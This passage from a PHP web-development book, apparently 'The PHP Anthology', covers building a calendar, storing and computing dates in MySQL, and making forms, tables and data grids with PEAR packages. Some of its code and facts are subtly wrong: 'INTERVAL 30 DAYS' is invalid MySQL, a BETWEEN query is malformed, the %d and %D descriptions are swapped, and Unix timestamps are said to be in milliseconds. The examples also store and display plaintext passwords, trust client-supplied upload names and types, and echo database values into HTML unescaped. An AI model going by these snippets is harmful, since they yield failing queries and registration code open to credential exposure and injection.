 $calendar_data[] = sprintf($html, date("F", $next_month),
     date("Y", $next_month), date("M", $next_month));



The third row simply consists of the days of the week, starting from Monday:

                                                                calendar.php (excerpt)

 $calendar_data[]     =   "Mon";
 $calendar_data[]     =   "Tue";
 $calendar_data[]     =   "Wed";
 $calendar_data[]     =   "Thu";
106   The PHP Anthology


       $calendar_data[] = "Fri";

       $calendar_data[] = "Sat";

       $calendar_data[] = "Sun";




      To make sure that the numeric dates synchronize to the date of the week, we first
      insert a number of blank columns. We use the N placeholder in the date function
      so it returns the numeric day of the week on which the first of the month will fall,
      and using a for loop, we add the EMPTY_COLUMN constant for the remaining days:

                                                                     calendar.php (excerpt)

       $blank_days = date("N", $start_date);

       for ($i = 1; (int) $blank_days > $i; $i++)
       {
         $calendar_data[] = EMPTY_COLUMN;
       }



      We then add the numeric days of the current month to the calendar data array. Next,
      we instantiate our HTML_Table_Matrix object and pass our array to the setData
      method. And finally, we create a left-to-right, top-to-bottom
      HTML_Table_Matrix_Filler object so that our HTML_Table_Matrix can work out
      the rows and columns required for the final output:

                                                                     calendar.php (excerpt)

       foreach ($date_range as $day)
       {
         $calendar_data[] = $day;
       }

       $calendar = new HTML_Table_Matrix();
       $calendar->setTableSize(8,7);
       $calendar->setData($calendar_data);
       $filler = HTML_Table_Matrix_Filler::factory("LRTB", $calendar);
       $calendar->accept($filler);



      We use the toHTML method to display our results:
Dates and Times    107

                                                                              calendar.php (excerpt)

 <h1>PHP Calendar</h1>
 <div id="cal">
 <?php echo $calendar->toHTML(); ?>
 </div>



The finished product can be seen in Figure 4.1.




                   Figure 4.1. A calendar generated using PEAR::HTML_Table_Matrix


And there you have it. Be intimidated no more! Keep this solution handy in your
PHP toolkit and you’ll be able to whip up a calendar in no time at all, no matter
what the application.


How do I store dates in MySQL?
Human-readable dates come in a variety of formats that can suit many situations.
However, these formats are not the best way to store dates.

At first glance, the easiest way to store dates in MySQL may appear to be to simply
drop them in exactly as they’d appear on a web page; for example, “8th March
2003”. Be warned—taking this route is the first step on the path to serious hair loss
and ulcers. For example, the WHERE clause in an SQL statement run against MySQL
will not allow you to do things like this:
108   The PHP Anthology


       SELECT * FROM table WHERE date > '14th February 2007'



      '14th February 2007' is not a date value—it’s only a date represented by a string.
      It can’t be manipulated or compared as a date value until it is converted into such
      a value. If you store your dates as strings you’ll be forever converting them to and
      from date value data types. And who needs that kind of headache?

      Solution
      A far better way to store date information is to use a MySQL timestamp.

      To get the current time, in the current server’s local timezone, we can use the NOW
      or CURRENT_TIMESTAMP functions. We can also use the UTC_TIMESTAMP to obtain the
      UTC timezone timestamp:

       mysql> SELECT CURRENT_TIMESTAMP();

       +---------------------+

       | CURRENT_TIMESTAMP() |

       +---------------------+

       | 2007-11-05 21:18:28 |

       +---------------------+


       mysql> SELECT NOW();

       +---------------------+

       | NOW()               |

       +---------------------+

       | 2007-11-05 21:18:32 |

       +---------------------+


       mysql> SELECT UTC_TIMESTAMP();

       +---------------------+

       | UTC_TIMESTAMP()     |

       +---------------------+

       | 2007-11-06 02:18:44 |

       +---------------------+



      Discussion
      MySQL timestamps are simpler than Unix timestamps. The generalized form is
      YYYY-MM-DD HH:MM:SS and is typically stored in a column of type DATETIME (not to
      be confused with the column types DATE and TIME, which store only YYYY-MM-DD
      and HH:MM:SS respectively).
Dates and Times     109

Timestamps in this form are perfect for simple sorting and comparison operations,
and they have the advantage of being human-readable. They also have a predictable
length (until we get to the year 9999), which makes them easier to validate.

You can take advantage of the many native MySQL date and time functions via the
native MySQL DATETIME column type, which is also easy to convert to a Unix
timestamp if required.


How do I format MySQL timestamps?
MySQL timestamps, while human-readable, are not exactly human-friendly—you
probably wouldn’t use them on your birthday party invitations, for example. Instead
of 2008-02-14 13:00:00 I’m sure you’d much prefer to write “February 14th, 2008
at 1 p.m.” Lucky for us, making MySQL timestamps human-friendly is extremely
easy—your party invitations will look great. I promise!

Solution
MySQL, like PHP, has a date formatting function which, aptly, is named the
DATE_FORMAT function. To use this function, we simply pass a format string and a
timestamp as follows:

 mysql> SELECT DATE_FORMAT(NOW(), "%W %M %D, %Y");

 +------------------------------------+

 | DATE_FORMAT(NOW(), "%W %M %D, %Y") |

 +------------------------------------+

 | Monday October 8th, 2007           |

 +------------------------------------+
110   The PHP Anthology

      Table 4.2. DATE_FORMAT Specifiers

                Specifier                                       Description

                   %a              abbreviated weekday name (Sun … Sat)

                   %b
             abbreviated month name (Jan … Dec)

                   %c              month, numeric (0 … 12)


                   %d              day of the month with English suffix (0th, 1st, 2nd, 3rd, …)


                   %D              day of the month, numeric (00 … 31)


                   %e              day of the month, numeric (0 … 31)

                   %f              microseconds (000000 … 999999)

                %H or %k           hour (00 … 23)

              %h, %I, or %l        hour (01 … 12)

                   %i              minutes, numeric (00..59)

                   %M              month name (January..December)

                   %m              month, numeric (00..12)

                   %p              a.m. or p.m.

                   %r              time, 12-hour (hh:mm:ss followed by a.m. or p.m.)

                %S or %s           seconds (00 … 59)

                   %T              time, 24-hour (hh:mm:ss)

                   %W              weekday name (Sunday … Saturday)

                   %w              day of the week (0=Sunday … 6=Saturday)

                   %Y              year, numeric, four digits

                   %y              year, numeric (two digits)

                   %%              a literal % character


      Much like the PHP date function, the DATE_FORMAT function uses a format string
      containing specifiers to define the formatting. A list of commonly used specifiers
      can be seen in Table 4.2.
Dates and Times      111


How do I perform date
calculations using MySQL?
When performing queries, it’s not uncommon to find the need for date range spe­
cification. You may, for example, need to retrieve all blog posts created within the
last 30 days. Date calculations are a breeze in MySQL; let’s have a look at them.

Solution
You can perform complex date math using the MySQL date functions. We can add
and subtract time intervals that are identified using the INTERVAL keyword via the
DATE_ADD and DATE_SUB functions. Thus, we use DATE_ADD to add one day:


 mysql> SELECT DATE_ADD(NOW(), INTERVAL 1 DAY);

 +---------------------------------+

 | DATE_ADD(NOW(), INTERVAL 1 DAY) |

 +---------------------------------+

 | 2007-10-09 21:32:20             |

 +---------------------------------+



Likewise, we use DATE_SUB to subtract one day:

 mysql> SELECT DATE_SUB(NOW(), INTERVAL 1 DAY);

 +---------------------------------+

 | DATE_SUB(NOW(), INTERVAL 1 DAY) |

 +---------------------------------+

 | 2007-10-07 21:32:26             |

 +---------------------------------+



We can also add or subtract months and years:

 mysql> SELECT DATE_ADD(NOW(), INTERVAL 1 MONTH);

 +-----------------------------------+

 | DATE_ADD(NOW(), INTERVAL 1 MONTH) |

 +-----------------------------------+

 | 2007-11-08 21:31:05               |

 +-----------------------------------+


 mysql> SELECT DATE_SUB(NOW(), INTERVAL 1 MONTH);

 +-----------------------------------+

 | DATE_SUB(NOW(), INTERVAL 1 MONTH) |
112   The PHP Anthology


       +-----------------------------------+

       | 2007-09-08 21:31:55               |

       +-----------------------------------+


       mysql> SELECT DATE_ADD(NOW(), INTERVAL 1 YEAR);

       +----------------------------------+

       | DATE_ADD(NOW(), INTERVAL 1 YEAR) |

       +----------------------------------+

       | 2008-10-08 21:32:31              |

       +----------------------------------+


       mysql> SELECT DATE_SUB(NOW(), INTERVAL 1 YEAR);

       +----------------------------------+

       | DATE_SUB(NOW(), INTERVAL 1 YEAR) |

       +----------------------------------+

       | 2006-10-08 21:32:37              |

       +----------------------------------+



      We can use more human-friendly terms when writing SQL queries in MySQL—such
      as 1 DAY, 1 MONTH, and 1 YEAR—than when we deal with Unix timestamps, which
      are measured in milliseconds. With MySQL, we can use the DATE_SUB and DATE_ADD
      functions to retrieve database records within a certain date range. Here, we get all
      the data with an updated_date within the last 30 days:

       SELECT * FROM my_table WHERE

       ➥ DATE_SUB(NOW(), INTERVAL 30 DAYS) >= updated_date;


      Similarly, the following will yield the rows with an updated_date that’s more than
      one week old, but no more than 14 days old:

       SELECT * FROM my_table WHERE

       ➥ updated_date BETWEEN(DATE_SUB(NOW(), INTERVAL 14 DAYS),
       ➥ DATE_SUB(NOW(), INTERVAL 7 DAYS);


      As you can see, MySQL date functions make it incredibly easy to calculate dates,
      thanks to the use of human-friendly terms.


      Summary
      In this chapter, we’ve investigated the use of Unix timestamps and the flexibility
      of the PHP strtotime and date functions, so that we can complete almost any job
Dates and Times      113

involving dates and times without raising a sweat. We’ve also seen that MySQL offers
a range of date functions, which offer similar capabilities to those available in PHP,
by combining DATE_SUB or DATE_ADD with the INTERVAL keyword.

You may be wondering which approach you should take in making your own date
calculations—should you use the PHP functions or try the MySQL functions? The
decision is an easy one: when the timestamps are stored in a database, it’s quicker
to use the MySQL method. However, as we saw in the calendar example in this
chapter, when the timestamps don’t originate in the database, it’s quicker to use
the PHP approach.

None of us can escape the relentless march of time, but when we harness the power
of the PHP date functions we can, at least, master time calculations and presentation.
Functions like strtotime and date may seem simplistic at first glance, but can be
used with great sophistication in your web applications.
The PHP Anthology
5
                                                  Chapter




Forms, Tables, and Pretty URLs
Creating interactive web pages is what PHP is all about. As you use PHP to build
web sites and applications, you’ll quickly notice that you’re called upon to develop
the same web page elements over and over.

When you’re working on your first PHP web site, writing a script to generate an
HTML table may not seem like a huge problem, but give it time: after you’ve put
together a few sites and have had to go back to modify your past efforts again and
again, working on tables won’t seem so rosy. Eventually, the mere mention of the
word “maintenance” may well have you gasping “Not another table!” as you weep
quietly into your keyboard.

Fear not—help is at hand! Not all HTML is the same, yet there are obvious common­
alities between HTML elements. These commonalities make the perfect targets for
PHP’s classes, which allow you to eliminate repetitive work and concentrate on the
creative aspects of programming that you enjoy.

In this chapter, we’ll provide solutions for some of the most common tasks: building
forms, building tables, and creating pretty URLs. In the process, we’ll make extensive
116   The PHP Anthology

      use of some of PEAR’s HTML packages—as a step up from hand coding your own
      HTML forms and tables, PEAR represents excellent value.

      Some of the examples we’ll discuss here will use the following database tables.
      First up, a table for users:

                                                                  chapter_05.sql (excerpt)

       CREATE TABLE user (
         id          INT(11)     NOT NULL AUTO_INCREMENT,
         login       VARCHAR(50) NOT NULL DEFAULT '',
         password    VARCHAR(50) NOT NULL DEFAULT '',
         email       VARCHAR(50)          DEFAULT NULL,
         first_name VARCHAR(50)           DEFAULT NULL,
         last_name   VARCHAR(50)          DEFAULT NULL,
         signature   TEXT        NOT NULL,
         PRIMARY KEY (id),
         UNIQUE KEY user_login (login)
       );



      We’ll also use this table to store images:

                                                                  chapter_05.sql (excerpt)

       CREATE TABLE user_images (
         image_id    INT(11)             NOT   NULL AUTO_INCREMENT,
         user_id     INT(11)             NOT   NULL,
         type        VARCHAR(50)         NOT   NULL DEFAULT '',
         filename    VARCHAR(32)         NOT   NULL,
         PRIMARY KEY (image_id)
       );




      How do I build HTML forms with PHP?

      HTML forms are the key input mechanism for user data on a web site. As web de­
      velopers, we must handle several facets of HTML forms:

      ■ form generation
      ■ form validation
      ■ retrieving valid form data
      ■ repopulating invalid forms with submitted data
Forms, Tables, and Pretty URLs      117


Solution
Thankfully, PEAR comes to the rescue with HTML_QuickForm,1 which aims to do
exactly as its name states—make forms quickly. HTML_QuickForm can help to auto­
mate all the tasks associated with form building.


          Using HTML_QuickForm2
         At the time of writing, PEAR had released an alpha version of the
         HTML_QuickForm2 class.2 This new version is written specifically for PHP 5 and
         is compatible with the E_STRICT level of error reporting.


Our first example demonstrates how easy it is to build a registration form using the
HTML_QuickForm class. We begin our form by including the HTML/QuickForm.php
file and instantiating our HTML_QuickForm object:

                                                                     htmlForm.php (excerpt)

    <?php
      require_once 'HTML/QuickForm.php';
      $form = new HTML_QuickForm('Create', 'post', basename(__FILE__));



The arguments supplied to the constructor represent the form’s name, method, and
action HTML attributes.

Next, we start to add the required form elements using the addElement method:

                                                                     htmlForm.php (excerpt)

      $opts = array('size' => 20, 'maxlength' => 255);
      $form->addElement('static', 'header', null,
          '<h1>Register</h1>'
      );
      $form->addElement('text', 'first_name', 'First Name', $opts);
      $form->addElement('text', 'last_name', 'Last Name', $opts);
      $form->addElement('text', 'login', 'Login Name', $opts);
      $form->addElement('password', 'password', 'Password', $opts);
      $form->addElement('text', 'email', 'E-Mail', $opts);


1
    http://pear.php.net/package/HTML_QuickForm/
2
    http://pear.php.net/package/HTML_QuickForm2/
118   The PHP Anthology


            $form->addElement('static', 'valid', null, 

                '<strong>E-Mail address must be valid, and will only be'.

                ' used for account verification.</strong>'

            );

            $form->addElement('textarea', 'signature', 'Signature', 

                array('rows' => 10, 'cols' => 20));

            $form->addElement('file', 'avatar', 'Avatar Image');

            $form->addElement('static', 'reqs', null, 

                '<strong>Image <em>must</em> be no more than 64x64 pixels' .

                ' in size.</strong>'

            );

            $form->addElement('submit', 'register', "Register Now!");




      The first argument passed to the addElement method represents the element type.
      Many element types are possible, and each is represented by a PHP class—the full
      list is available on the “QuickForm element types” PEAR documentation page.3

      The element types we’ve used above include static, which represents static HTML
      content that’s not submitted with the form. We’ve used static elements for the
      heading and form help text. The other types we’ve used include text, password,
      textarea, file, and submit; each represents its respective HTML form element
      equivalent.

      The remaining arguments, which we’ve passed to the addElement method, are
      subsequently passed to the constructor methods of the appropriate type classes and,
      as such, are specific to those classes. The “QuickForm element types” PEAR docu­
      mentation page has all the details you’ll need to use these classes.4

      After we’ve added the form elements, we can obtain the form HTML source using
      the toHTML method:

                                                                               htmlForm.php (excerpt)

            $formsource = $form->toHtml();
          ?>



      The only thing that’s left to do is add the form source to a web page:

      3
          http://pear.php.net/manual/en/package.html.html-quickform.intro-elements.php
      4
          http://pear.php.net/manual/en/package.html.html-quickform.intro-elements.php
Forms, Tables, and Pretty URLs    119


                                                                      htmlForm.php (excerpt)

 <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   ⋮ HTML head contents…
   </head>
   <body>
     <?php echo $formsource; ?>
   </body>
 </html>



That code above will render as shown in Figure 5.1.




                           Figure 5.1. Our first registration form
120   The PHP Anthology

      As you can see, this form really doesn’t do much, and apart from that fact that it
      was slightly easier to build this form than to hand-code the HTML, you might be
      forgiven for asking, “What’s all the fuss about?” Well, as you’ll see in the next ex­
      ample, we can add complex validation rules to the form with a minimum of fuss
      and bother.

      We use the addRule method to add validation rules to the form:5

                                                                     htmlFormValidation.php (excerpt)

          $form->addRule('first_name',
              'You must enter your first name',
              'required', null, 'client'
          );
          $form->addRule('first_name',
              'Your first name must be at least 3 letters',
              'minlength', '3', 'client'
          );



      The first argument to the addRule method is the form element name, which is fol­
      lowed by the error message. The next argument indicates the type of validation re­
      quired, and includes an extra, optional argument for the validation type, and an
      optional indication of where the validation should occur; this setting can specify
      client or server. If it specifies client, JavaScript validation is added to the form
      to support the rule.

      You may have noticed in the code above that you can add multiple rules for a single
      form element. We can see that the first rule in the code above is a required rule,
      which indicates that the field cannot be blank. As no arguments are required for
      this rule, the next argument is null. The final argument indicates the validation is
      to occur on the client, that is, the browser. The second rule is a minlength rule
      and the optional argument indicates that the first_name field value has a minimum
      length of 3 characters.

      We’re not limited to only those rules, however. Many other validation types are
      available, and they’re all handily documented on the PEAR web site.6 Let’s go ahead
      and add more rules for the remaining elements:

      5
          http://pear.php.net/manual/en/package.html.html-quickform.html-quickform.addrule.php
      6
          http://pear.php.net/manual/en/package.html.html-quickform.intro-validation.php
Forms, Tables, and Pretty URLs       121


                                                 htmlFormValidation.php (excerpt)

   $form->addRule('last_name',
       'You must enter your last name',
       'required', null, 'client'
   );
   $form->addRule('last_name',
       'Your last name must be at least 3 letters',
       'minlength', '3', 'client'
   );
   $form->addRule('email',
       'You must enter your email address',
       'required', null, 'client'
   );
   $form->addRule('email',
       'Please enter a valid email address',
       'email', FALSE, 'client'
   );
   $form->addRule('login',
       'You must enter a login name',
       'required', null, 'client'
   );
   $form->addRule('login',
       'Your login name must be between 6-20 characters long',
       'rangelength', array(6, 20), 'client'
   );
   $form->addRule('password',
       'You must enter a password',
       'required', null, 'client'
   );
   $form->addRule('password',
       'Your Password must be at least 6 characters long.',
       'minlength', '6', 'client'
   );



Now that we’ve added these rules, we can add some form handling code:
122   The PHP Anthology

                                                           htmlFormValidation.php (excerpt)



         if ($form->validate())
         {
           $form->removeElement('validemail');
           $form->removeElement('reqs');
           $form->removeElement('avatar');
           $form->removeElement('register');
           $form->freeze();
           $formsource = $form->toHtml();
         }
         else
         {
           $formsource = $form->toHtml();
         }
       ?>



      The validate method allows us to check to see whether or not the form has been
      submitted, and passed all the validation requirements. If the form validates, you
      can add code at this step to manipulate the form data in some way—to save it to a
      database, for example. For the purposes of our example solution, we freeze the form
      and display it again. Elements that are frozen only display their values—not the
      editable form element. Of course, this makes no difference to static elements and
      buttons, so we remove those elements from the form before we freeze it. Using the
      freeze method to freeze the form allows us to add a confirmation step to the form
      submission process, which gives users a chance to review their information before
      they submit it.

      If the form has not passed validation, we simply display its HTML source. This step
      is also taken if the form has not yet been submitted. If validation errors have been
      detected, the validation rule error messages will be added to the form’s HTML
      source.

      You can see the rendered form in Figure 5.2. Notice how the presence of the valid­
      ation rules has automatically inserted required field indicators. That image also
      shows the error message that was added by the server-side validation mechan­
      ism—you’ll have to disable JavaScript in your browser to see this message yourself.
      Figure 5.3 shows the frozen form.
Forms, Tables, and Pretty URLs   123





Figure 5.2. The registration form with validation mechanisms
124   The PHP Anthology




                                  Figure 5.3. The frozen registration form


      Now that we’ve validated the data submitted by our users, we need to accept and
      store it. Let’s look at an alternative to the above example, in which we extract the
      form data and insert it into our database. To extract the submitted data from the
      form, we simply use the exportValues method:

                                                                             htmlFormExport.php (excerpt)

       if ($form->validate())
         {
           $values = $form->exportValues();



      Now that we have our form data, we can make a database connection and insert it
      into the database:

                                                                             htmlFormExport.php (excerpt)

            require 'dbcred.php';
            try
            {
              $db = new PDO($dsn, $user, $password);
              $db->setAttribute(PDO::ATTR_ERRMODE,
                  PDO::ERRMODE_EXCEPTION);

              $sql = 'INSERT INTO user ' .
                     '(login, password, email, first_name, last_name,' .
Forms, Tables, and Pretty URLs      125


                 ' signature) VALUES (:login, :password, :email,' .

                 ' :firstname, :lastname, :sig)';


        $stmt = $db->prepare($sql);

        $stmt->bindParam(':login', $values['login']);

        $stmt->bindParam(':password', $values['password']);

        $stmt->bindParam(':email', $values['email']);

        $stmt->bindParam(':firstname', $values['first_name']);

        $stmt->bindParam(':lastname', $values['last_name']);

        $stmt->bindParam(':sig', $values['signature']);

        $stmt->execute();




First, we insert the registration information into the user table. Using PDO and the
prepare and execute methods with bound parameters allows us to safely use the
form data in our SQL query. For more information about this technique, have a look
at “How do I add data to, or modify data in, my database?” in Chapter 2.

Next, we obtain the insert ID from the previous database insert operation; we’ll need
this in a moment. The $form->_submitFiles property contains an array of files that
were submitted with the form. We can use this information to gain access to the
avatar image file, and move it to the avatar directory, applying a unique filename
to it at the same time:

                                                         htmlFormExport.php (excerpt)

        $id = $db->lastInsertId();
        $type = $form->_submitFiles['avatar']['type'];
        $file = 'images/avatars/' . md5(microtime()) .
            basename($form->_submitFiles['avatar']['name']);

        move_uploaded_file(
            $form->_submitFiles['avatar']['tmp_name'],
            $file
        );



We also need to insert this image file information into the user_image table. This
is a great opportunity to use that insert ID we saved in the previous operation:
126   The PHP Anthology

                                                              htmlFormExport.php (excerpt)

                 $sql = 'INSERT INTO user_images' .
                     ' (user_id, type, filename) VALUES' .
                     ' (:id, :type, :file)';
                 $stmt = $db->prepare($sql);
                 $stmt->bindParam(':id', $id);
                 $stmt->bindParam(':type', $type);
                 $stmt->bindParam(':file', $file);
                 $stmt->execute();



      Our final task is to create the confirmation display:

                                                              htmlFormExport.php (excerpt)

                 $form->removeElement('validemail');
                 $form->removeElement('reqs');
                 $form->removeElement('avatar');
                 $form->removeElement('register');
                 $form->freeze();
                 $formsource = $form->toHtml() . '<p>The above information has
                 ➥ been successfully submitted</p>';
             }



      If, however, a database exception occurred, we’ll need to log the error and create
      the error message display:

                                                              htmlFormExport.php (excerpt)

             catch(PDOException $e)
             {
               error_log('Registraiton form error: '. $e->getMessage());
               $form->removeElement('validemail');
               $form->removeElement('reqs');
               $form->removeElement('avatar');
               $form->removeElement('register');
               $form->freeze();
               $formsource = $form->toHtml() . '<p>An error has occurred. The
               ➥ above information was not successfully submitted</p>';
             }
         }
Forms, Tables, and Pretty URLs      127

Finally, as usual, if the form hasn’t been submitted, we just display it:

                                                                    htmlFormExport.php (excerpt)

      else
      {
        $formsource = $form->toHtml();
      }



Using the HTML_QuickForm class allows you to quickly and efficiently add web page
forms to your web site or web application with a minimum of fuss. Make sure you
check out the PEAR documentation to discover all the other functionality available
in the class.7


How do I display data in a table?
Tables are an integral part of data display, which—let’s face it—is an integral part
of most web pages! So how do you easily display your data in a table, in a way that
automates most of the boring, repetitive pieces of table HTML you have to write?

Solution
The answer to this question is to use PEAR’s HTML_Table class.8 In this example,
we’ll use HTML_Table to display the results of a simple SQL query.

First, we need to include the required PHP files:

                                                                          pearTable.php (excerpt)

    <?php
      require 'dbcred.php';
      require 'HTML/Table.php';



dbcred.php contains our database login credentials for use with PDO. The file contains
credentials relevant to our testing environment, so you’ll need to change them
should you wish to try this on your own web server. HTML/Table.php contains the
HTML_Table class.


7
    http://pear.php.net/package/HTML_QuickForm/
8
    http://pear.php.net/manual/en/package.html.html-table.php
128   The PHP Anthology

      Next, we instantiate our PDO object and perform the SQL query. We open a try
      block to catch any PDOExceptions that may occur:

                                                                   pearTable.php (excerpt)

         try
         {
           $db = new PDO($dsn, $user, $password);
           $db->setAttribute(PDO::ATTR_ERRMODE,
               PDO::ERRMODE_EXCEPTION);

            $sql = "SELECT * FROM user";

            $stmt = $db->prepare($sql);
            $stmt->execute();



      The creation of the table is simple. We instantiate the HTML_Table object and call
      the setAutoGrow method, which activates a flag instructing HTML_Table to automat­
      ically add rows and columns when data is added into a non-existent cell. We then
      call the addRow method to add a header row:

                                                                   pearTable.php (excerpt)

            $table = new HTML_Table;
            $table->setAutoGrow(true);
            $table->addRow(array("","Login","Password","E-Mail",
                "First Name","Last Name","Signature"), null, "th");



      That row addition is followed by a while loop in which we call the addRow method
      to add the query results. The addRow method accepts an indexed array as an argument
      for the row content, so we need to call PDOStatement->fetch with the
      PDO::FETCH_NUM argument to make PDO return our row data as an indexed array.
      Finally, we call toHTML to assign the table HTML source to a variable:

                                                                   pearTable.php (excerpt)

            while ($row = $stmt->fetch(PDO::FETCH_NUM))
            {
                $table->addRow($row);
            }
Forms, Tables, and Pretty URLs      129



     $tablesource = $table->toHTML();

   }




Our catch block simply logs any errors and sets the $tablesource variable to an
empty string, thus avoiding outputting any cryptic error messages to our web page
users:

                                                            pearTable.php (excerpt)

   catch (PDOException $e)
   {
     error_log('Error in '.$e->getFile().
         ' Line: '.$e->getLine().
         ' Error: '.$e->getMessage()
     );
     $tablesource = "";
   }
 ?>



The $tablesource variable can now be used in the web page output:

                                                            pearTable.php (excerpt)

 <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   ⋮ HTML head contents…
   </head>
   <body>
     <h1>PEAR::HTML_Table</h1>
     <?php echo $tablesource ?>
   </body>
 </html>



And we’re done! HTML_Table is a great time saver for outputting tabular data.
130   The PHP Anthology


      How do I display data in a sortable table?
      Usually there’s more to displaying tabular data than just putting it in a table. If you
      have large data sets, you might like to add user interface controls like column sorting
      or paging to your tables, so that your users can easily digest the content in small
      chunks.

      Solution
      The PEAR Structures_DataGrid class is more than capable of handling the job.9
      Structures_DataGrid has more features than I can list here—we’ll only be using
      a few of them in our solution, which builds an HTML table with column sorting
      and paging controls. This solution also requires several PEAR packages to function
      properly. They are: Structures_DataGrid_DataSource_MDB2,10
                           11                                             12
      MDB2_Driver_mysql, Structures_DataGrid_Renderer_HTMLTable, and
                                                13
      Structures_DataGrid_Renderer_Pager. Once we’ve made sure all those PEAR
      packages are installed, we can get started on the solution.

      First, we need to include the required PHP files:

                                                                        pearDataGrid.php (excerpt)

          <?php
            require 'dbcred.php';
            require 'Structures/DataGrid.php';



      dbcred.php contains our database login credentials, which we’ll use with our
      Structures_DataGrid object. The file contains credentials relevant to our testing
      environment, so you’ll need to change them to suit should you wish to try this on
      your own web server. Structures/DataGrid.php is required to create our
      Structures_DataGrid object.

      The next step is to instantiate our Structures_DataGrid object and bind it to the
      SQL query:

      9
        http://pear.php.net/package/Structures_DataGrid/
      10
         http://pear.php.net/package/Structures_DataGrid_DataSource_MDB2/
      11
         http://pear.php.net/package/MDB2_Driver_mysql/
      12
         http://pear.php.net/package/Structures_DataGrid_Renderer_HTMLTable/
      13
         http://pear.php.net/package/Structures_DataGrid_Renderer_Pager/
Forms, Tables, and Pretty URLs      131

                                                           pearDataGrid.php (excerpt)

   $datagrid = new Structures_DataGrid(2);
   $options = array(
       'dsn' => "mysql://$user:$password@$db_host/$db_name");

   $sql = "SELECT * FROM user";
   $bind = $datagrid->bind($sql, $options);

   if (PEAR::isError($bind))
   {
     error_log('DataGrid Error: '. $bind->getMessage());
     $gridsource = '';
   }



We instantiate the grid, specifying that each page should display two rows. We then
bind the grid to the SQL query using the bind method. We pass database information
in the $options array to enable our Structures_DataGrid object to automatically
choose the correct database driver to use, and make a connection. We check for errors
that may have been generated from the bind method call using the PEAR::isError
method, and if we detect an error, we make sure to log it and set our $gridsource
variable to an empty string. This will ensure that the displayed web page will not
contain any cryptic error messages.

If no errors are reported, we can proceed to build our grid. We start by defining the
columns and setting rendering options for the grid:

                                                           pearDataGrid.php (excerpt)

   else
   {
     $columns = array(
         'first_name' => 'First Name',
         'last_name' => 'Last Name',
         'email' => 'E-Mail',
         'login' => 'Login Name',
         'signature' => 'Signature',
     );
     $datagrid->generateColumns($columns);
     $renderer_options = array(
         'sortIconASC' => '&uArr;',
         'sortIconDESC' => '&dArr;',
132   The PHP Anthology


                'headerAttributes' => array('bgcolor' => '#E3E3E3'),

                'evenRowAttributes' => array('bgcolor' => '#A6A6A6'),

             );

             $datagrid->setRendererOptions($renderer_options);

             $renderer = $datagrid->getRenderer();

             $renderer->setTableAttribute('cellspacing', 0);

             $renderer->setTableAttribute('cellpadding', 5);

             $renderer->setTableAttribute('border', 1);




      To generate the columns of our grid, we call the convenient generateColumns
      method. All we have to do is supply an array that maps our SQL field names to
      column labels—Structures_DataGrid will do the rest.

      Next, we retrieve the HTML source of our grid and pager using the getOutput
      method, and store it in the $gridsource variable:

                                                                pearDataGrid.php (excerpt)

             $gridbody = $datagrid->getOutput();
             if (PEAR::isError($gridbody))
             {
               error_log('DataGrid render error: ' .
                   $gridbody->getMessage());
               $gridbody = '';
             }

             $gridpager = $datagrid->getOutput(DATAGRID_RENDER_PAGER);
             if (PEAR::isError($gridpager))
             {
               error_log('DataGrid render error: ' .
                   $gridpager->getMessage());
               $gridpager = '';
             }
             $gridsource = $gridbody . $gridpager;
         }
       ?>



      When we call the getOutput method, we make sure to test the return value for errors
      and take appropriate action.

      Finally, our grid can be output to a web page:
Forms, Tables, and Pretty URLs           133

                                                                     pearDataGrid.php (excerpt)

 <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   ⋮ HTML head contents…
   </head>
   <body>
     <h1>PEAR::Structures_DataGrid</h1>
     <?php echo $gridsource ?>
   </body>
 </html>



With these scant few lines of code, we can generate a dynamic table that will auto­
matically allow users to order the data by clicking on each column’s header, and
will automatically implement dynamic paging. The resulting output can be seen in
Figure 5.4.




                         Figure 5.4. Structures_DataGrid in action


As we can see, Structures_DataGrid handles a huge amount of the work necessary
to generate a very feature-rich table, including modifying the SQL query to incor­
porate ordering and paging, and making sure that the icon to denote ordering direc­
tion is shown correctly.
134   The PHP Anthology


      How do I create a customized data grid?
      Showing tabular data in a table seems fairly straightforward, but when the tables
      are part of a web application, customization is often required. For example, you
      might want to display a list of member information in a tabular format, customizing
      one column to display members’ avatar thumbnails.

      Solution
      The Structures_DataGrid class allows you to specify formatter function callbacks
      to customize the data shown in a table. In this solution, we’ll add customized
      columns for the members’ names and avatars. Make sure you check out “How do I
      display data in a sortable table?” in this chapter to make sure you have everything
      on the list of required PEAR packages.

      The first step is to include the required PHP files:

                                                             pearDataGridCustom.php (excerpt)

       <?php
         require 'dbcred.php';
         require 'Structures/DataGrid.php';



      dbcred.php contains the database login credentials for use with our
      Structures_DataGrid object. The file contains credentials relevant to our testing
      environment, so be sure to change them should you wish to try this on your own
      web server. Structures/DataGrid.php is required to create our Structures_DataGrid
      object.

      Next, we define some custom callback functions, getName, and getThumbnail:

                                                             pearDataGridCustom.php (excerpt)

         function getName($data)
         {
           return $data['record']['first_name'] .' '.
               $data['record']['last_name'];
         }

         function getThumbnail($data)
Forms, Tables, and Pretty URLs      135


   {

     if (strlen($data['record']['filename']) > 0)

     {

       return '<img src="images/avatars/'

           .$data['record']['filename']. '" />';

     }

     else 

     {

       return '<img src="images/avatars/missing.gif" />';

     }

   }




The first function, getName, simply concatenates the first_name and last_name
columns. getThumbnail returns an HTML <img> tag using the filename column.
When a callback function is called, it’s passed as an argument to an array that con­
tains the database row as well as some information about the column in question:
the current ordering and the row number. Callback functions must return the string
to be displayed in the column.

We then instantiate our Structures_DataGrid object and create a series of Struc­
tures_DataGrid_Column objects, each of which represents a display column. We
